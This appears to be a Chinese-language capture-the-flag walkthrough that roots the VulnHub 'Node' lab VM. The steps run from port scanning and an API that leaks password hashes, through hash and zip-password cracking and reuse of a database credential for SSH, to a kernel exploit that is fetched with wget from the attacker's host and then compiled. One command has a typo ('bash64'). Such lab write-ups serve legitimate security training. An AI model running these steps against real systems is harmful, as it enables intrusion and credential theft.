Node 靶机

靶机下载: https://www.vulnhub.com/entry/node-1,252/

渗透目标是通过 VMWare 安装的 Node 虚拟机, 网络连接方式为仅主机, 目标 IP 通过 DHCP 分配

主机发现

[[email protected] ~]# arp-scan -I eth0 -l

端口探测

[[email protected] ~]# nmap -sS -p1-65535 -v 192.168.64.129
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

服务识别

[[email protected] ~]# nmap -sV -T4 -p22,3000 192.168.64.129

port_service

查找漏洞

扫描目录

[[email protected] ~]# dirb http://192.168.64.129:3000 -f ~/web_file_list.txt

scan_web_file

没有扫描到 web 目录

使用BurpSuite 探测

获取到 http://192.168.64.129:3000/api/users/latest 中 JSON 格式的用户数据

api_user

尝试去掉 latest, 在 http://192.168.64.129:3000/api/users/ 中发现了管理员用户

user_admin

尝试破解密码

[[email protected] ~]# hash-identifier dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))

SHA-256 在线解密 https://md5decrypt.net/Sha256/

online_decrypter

用管理员登录

管理员登录后可以下载备份文件

down_bak

尝试解密备份

文件内容为 ASCII 文本, 预览后疑似 BASE64 编码

[[email protected] ~]# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators

尝试 BASE64 解码, 得到 zip 压缩包, 但是解压需要密码

[[email protected] ~]# cat myplace.backup | bash64 -d > myplace.bak
[[email protected] ~]# file myplace.bak
myplace.bak: Zip archive data, at least v1.0 to extract

尝试破解压缩包密码

[[email protected] ~]# fcrackzip -v -b -u -c a -p magicaaaa myplace.bak
... ...
PASSWORD FOUND!!!!: pw == magicword

解压后寻找可用信息

[[email protected] ~]# unzip myplace.bak
[[email protected] ~]# more var/www/myplace/app.js
... ...
const url = 'mongodb://mark:[email protected]:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
... ...

尝试使用 MongoDB 用户 ssh 登录

[[email protected] ~]# ssh [email protected]    #密码:5AYRft73VtFpc84k
[[email protected] ~]$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[[email protected] ~]$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

漏洞提权

[[email protected] ~]# searchsploit Ubuntu 16.04

发现漏洞提权代码

ubuntu_sploit

将提权代码传到靶机

[[email protected] ~]# systemctl start apache2.service
[[email protected] ~]# cp /usr/share/exploitdb/exploits/linux/local/44298.c /var/www/html/
[[email protected] /tmp]$ wget http://192.168.64.128/44298.c    
#192.168.64.128 为 Kali 虚拟机 IP
[[email protected] /tmp]$ gcc 44298.c -o exp
[[email protected] /tmp]$ ./exp
[[email protected] /tmp]# whoami
root